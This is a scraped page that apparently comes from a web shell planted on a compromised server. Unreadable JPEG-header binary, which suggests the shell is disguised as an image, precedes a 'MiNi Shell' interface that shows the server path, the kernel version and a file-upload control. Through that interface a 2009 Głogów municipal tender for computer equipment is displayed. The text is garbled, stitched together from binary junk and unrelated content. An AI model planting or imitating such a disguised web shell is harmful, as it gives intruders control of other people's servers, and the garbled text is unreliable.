JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090828/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090828/142699-N-2009.html

<p class="kh_header"><b>Głogów: DOSTAWA   SPRZĘTU KOMPUTEROWEGO,BIUROWEGO  I OPROGRAMOWANIA  
  DLA   POTRZEB URZĘDU  MIEJSKIEGO  W  GŁOGOWIE W 2009 r.</b><br>
<b>Numer ogłoszenia: 142699 - 2009; data zamieszczenia: 28.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Głogów , ul. Rynek 10, 67-200 Głogów, woj. dolnośląskie, tel. 076 7265437, 527, faks 076 7265437.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.glogow.sbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA   SPRZĘTU KOMPUTEROWEGO,BIUROWEGO  I OPROGRAMOWANIA  
  DLA   POTRZEB URZĘDU  MIEJSKIEGO  W  GŁOGOWIE W 2009 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1:  KOMPUTERY, NOTEBOOKI, , MONITORY LCD, PROJEKTORY,TABLICE MULTIMEDIALNE AKCESORIA KOMPUTEROWE, OPROGRAMOWANIE /SERWER/SKANER opis szczegółowy parametrów technicznych zgodnie z  załącznikiem Nr 4 do SIWZ/

CPV: 30.21.40.00-2 ; 30.21.31.00-6 ;  30.23.74.60-1;33.45.21.00-4;30.23.74.10-6;  30.21.61.10-0; 30.24.00.00-3; 30.23.60.00-2.
 
1)	Komputer stacjonarny typ 1	27 szt.
2)	Komputer stacjonarny typ 2	3 szt.
3)	Komputer stacjonarny typ 3	1 szt.
4)	Terminal graficzny	1 szt.
5)	Notebook typ 1	3 szt.
6)	Notebook typ 2	2 szt.
7)	Notebook typ 3	2 szt.
8)	Notebook typ 4	8 szt.
9)	Notebook typ 5	2 szt.
10)	Monitory LCD typ 1	24 szt.
11)	Monitory LCD typ 2	7 szt.
12)	Projektor multimedialny typ 1	1 szt.
13)	Projektor multimedialny typ 2	2 szt.
14)	Skaner wielkoformatowy A3	1 szt.
15)	Tablica multimedialna typ 1	1 szt.
16)	Tablica multimedialna typ 2	3 szt.
17)	Serwer	1 szt.
18)	Dysk 146 GB 15k U320 SCSI Hot Plug z ramką	4 szt.
19)	Dysk 146 GB 15k U320 SCSI Hot Plug	2 szt.
20)	Moduł do switcha HP ProCurve serii 5300xl	2 szt.
21)	Klawiatura PS2	10 szt.
22)	Mysz PS2 laser	10 szt.
23)	Windows Server  Enterprise PL	1 szt.
24)	MS Office 2007 Professional PL- wersja edukacyjna	6 szt.
25)	NOD32 BE SUITE PL	70 szt.
26)	SonicWALL Comprehensive Gateway Security Suite for PRO 3060/4060	1 szt.
27)	SonicWALL Comprehensive Gateway Security Suite for TZ 180 Series 10 and 25 Node	1 szt.

Część 2: DRUKARKI  , URZĄDZENIA WIELOFUNKCYJNE, NISZCZARKI DOKUMENTÓW/ opis szczegółowy parametrów technicznych zgodnie z załącznikiem Nr 5 do SIWZ/

CPV:  30.23.21.10-8 ; 30.19.14.00-8; 30.23.21.50-0; 

1	Urządzenie wielofunkcyjne z  dodatkowym tonerem	typ1	szt.1
2	Drukarka laserowa typ 1	szt.2
3	Drukarka atramentowa 	szt.2
4	Niszczarki dokumentów	szt.5.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.21.31.00-6, 30.23.74.60-1, 33.45.21.00-4, 30.23.74.10-6, 30.21.61.10-0, 30.24.00.00-3, 30.23.60.00-2, 30.23.21.10-8, 30.19.14.00-8, 30.23.21.50-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 5.000,00 złotych,
		słownie: pięć  tysięcy złotych. część I.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1)	Spełniają wymogi  art. 22 ust. 1 ustawy  Prawo zamówień publicznych.
2)	Nie podlegają wykluczeniu na podstawie art.24, ust.1 i 2 ustawy Prawo zamówień publicznych.
3)	Wykonali w ostatnich 3 latach przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , dostaw odpowiadających swoim rodzajem i wartością dostawom stanowiącym  przedmiot zamówienia., z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że dostawy te zostały wykonane należycie. Wymagane jest wykonanie dostaw w zakresie porównywalnym z dostawą będącą przedmiotem zamówienia o wartości: dla  części I co najmniej 50.000,00 zł. brutto, dla części II co najmniej 15.000,00 zł. brutto. Do wykazu sporządzonego według wzoru stanowiącego załącznik nr 4 i 5 do niniejszej SIWZ Wykonawca winien załączyć dokumenty potwierdzające, że dostawy te zostały wykonane należycie.(Wykonawcy składający ofertę wspólną przedstawiają razem jeden dokument w formie załącznika nr 4 i 5).
Ocena spełniania przez Wykonawców wszystkich warunków określonych w niniejszej SIWZ będzie dokonana przez Zamawiającego na zasadzie: spełnia - nie spełnia, na podstawie żądanych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Formularz ofertowy ( Zał. Nr 1) wraz z wypełnionymi załącznikami ,zał. nr 4 i 5.
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do   
      ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do   
      rejestru lub zgłoszenia   do   ewidencji   działalności   gospodarczej,  wystawione    
     nie   wcześniej  niż  6 miesięcy przed upływem terminu składania ofert.
3.	Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Oświadczenie, że  Wykonawca  spełnia  warunki  udziału  w  postępowaniu,  określone  w  art. 22 ust. 1 ustawy ( Zał. Nr 2).
5.	Oświadczenie, że  Wykonawca  spełnia  warunki  udziału  w  postępowaniu,  określone  w  art. 24 ust. 1 i 2  ustawy ( Zał. Nr 3).
6.	Deklaracje CE na oferowany elektroniczny sprzęt dot.części I i II
7.	Certyfikat ISO 9001 producenta na komputery stacjonarne.
8.	 Wykaz wykonanych dostaw  (Zał. Nr 6 ).
9.	Dokumentacja techniczna oferowanego sprzętu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - gwarancja - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.glogow.sbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów, pok. nr 314, III pietro..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.09.2009 godzina 09:00, miejsce: Urząd Miejski w Głogowie, Rynek 10, 67-200 Głogów, pok. nr 125, I pietro..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA   SPRZĘTU KOMPUTEROWEGO,BIUROWEGO  I OPROGRAMOWANIA  
  DLA   POTRZEB URZĘDU  MIEJSKIEGO  W  GŁOGOWIE W 2009 r
Część 1:  KOMPUTERY, NOTEBOOKI, , MONITORY LCD, PROJEKTORY,TABLICE MULTIMEDIALNE AKCESORIA KOMPUTEROWE, OPROGRAMOWANIE /SERWER/SKANER.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 30.24.00.00-3; 30.23.60.00-2.
 
1)	Komputer stacjonarny typ 1	27 szt.
2)	Komputer stacjonarny typ 2	3 szt.
3)	Komputer stacjonarny typ 3	1 szt.
4)	Terminal graficzny	1 szt.
5)	Notebook typ 1	3 szt.
6)	Notebook typ 2	2 szt.
7)	Notebook typ 3	2 szt.
8)	Notebook typ 4	8 szt.
9)	Notebook typ 5	2 szt.
10)	Monitory LCD typ 1	24 szt.
11)	Monitory LCD typ 2	7 szt.
12)	Projektor multimedialny typ 1	1 szt.
13)	Projektor multimedialny typ 2	2 szt.
14)	Skaner wielkoformatowy A3	1 szt.
15)	Tablica multimedialna typ 1	1 szt.
16)	Tablica multimedialna typ 2	3 szt.
17)	Serwer	1 szt.
18)	Dysk 146 GB 15k U320 SCSI Hot Plug z ramką	4 szt.
19)	Dysk 146 GB 15k U320 SCSI Hot Plug	2 szt.
20)	Moduł do switcha HP ProCurve serii 5300xl	2 szt.
21)	Klawiatura PS2	10 szt.
22)	Mysz PS2 laser	10 szt.
23)	Windows Server  Enterprise PL	1 szt.
24)	MS Office 2007 Professional PL- wersja edukacyjna	6 szt.
25)	NOD32 BE SUITE PL	70 szt.
26)	SonicWALL Comprehensive Gateway Security Suite for PRO 3060/4060	1 szt.
27)	SonicWALL Comprehensive Gateway Security Suite for TZ 180 Series 10 and 25 Node	1 szt..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.21.31.00-6, 30.23.74.60-1, 33.45.21.00-4, 30.23.74.10-6, 30.21.61.10-0, 30.24.00.00-3, 30.23.60.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. gwarancja - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA   SPRZĘTU KOMPUTEROWEGO,BIUROWEGO  I OPROGRAMOWANIA  
  DLA   POTRZEB URZĘDU  MIEJSKIEGO  W  GŁOGOWIE W 2009 r
Część 2: DRUKARKI  , URZĄDZENIA WIELOFUNKCYJNE, NISZCZARKI DOKUMENTÓW.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Urządzenie wielofunkcyjne z  dodatkowym tonerem	typ1	szt.1
2	Drukarka laserowa typ 1	szt.2
3	Drukarka atramentowa 	szt.2
4	Niszczarki dokumentów	szt.5.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.21.10-8, 30.19.14.00-8, 30.23.21.50-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. gwarancja - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com